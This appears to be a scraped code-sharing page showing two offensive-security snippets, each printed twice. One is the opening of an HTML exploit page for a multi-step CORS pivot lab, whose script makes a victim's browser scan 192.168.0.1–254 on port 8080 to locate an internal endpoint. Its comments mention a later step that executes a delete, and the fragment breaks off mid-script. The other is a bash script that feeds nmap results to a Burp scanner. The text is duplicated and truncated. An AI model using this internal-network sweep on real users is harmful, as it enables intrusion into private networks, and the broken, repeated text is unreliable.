Dominique RIGHETTO righettod

## cors-pivot-exploit.html
<!-- each script tag below is a seperate exploit page to use on the server, for this multi-step lab -->
<!-- technically only the first (to find the ip) and last (to execute the delete) are needed, but the
  middle two scripts were used by me to explore the site and craft the final exploit -->

<!-- find the ip address of the internal endpoint -->
<script>
for(var i = 1; i <= 254; i++) {
    var req = new XMLHttpRequest();
    req.open('get', 'http://192.168.0.' + i + ':8080/', true);
    req.onload = report(i);

## nmapburp.sh
#!/bin/bash
#Script to Scan All Sites Found With A Simple NMAP Scan With Burp.

sites=$(nmap "$1" --open 443 --resolve-all --open -oG - | awk 'NR!=1 && /open/{print $2}')

for site in $sites
do
curl -vgw "\\n" 'http://127.0.0.1:1337/v0.1/scan' -d '{"urls":["'"$site"'"]}'  > /dev/null 2>&1
printf "Scanning %s with burp.\\n" "$site"
done
	<!-- each script tag below is a seperate exploit page to use on the server, for this multi-step lab -->
	<!-- technically only the first (to find the ip) and last (to execute the delete) are needed, but the
	middle two scripts were used by me to explore the site and craft the final exploit -->

	<!-- find the ip address of the internal endpoint -->
	<script>
	for(var i = 1; i <= 254; i++) {
	var req = new XMLHttpRequest();
	req.open('get', 'http://192.168.0.' + i + ':8080/', true);
	req.onload = report(i);
	#!/bin/bash
	#Script to Scan All Sites Found With A Simple NMAP Scan With Burp.

	sites=$(nmap "$1" --open 443 --resolve-all --open -oG - \| awk 'NR!=1 && /open/{print $2}')

	for site in $sites
	do
	curl -vgw "\\n" 'http://127.0.0.1:1337/v0.1/scan' -d '{"urls":["'"$site"'"]}' > /dev/null 2>&1
	printf "Scanning %s with burp.\\n" "$site"
	done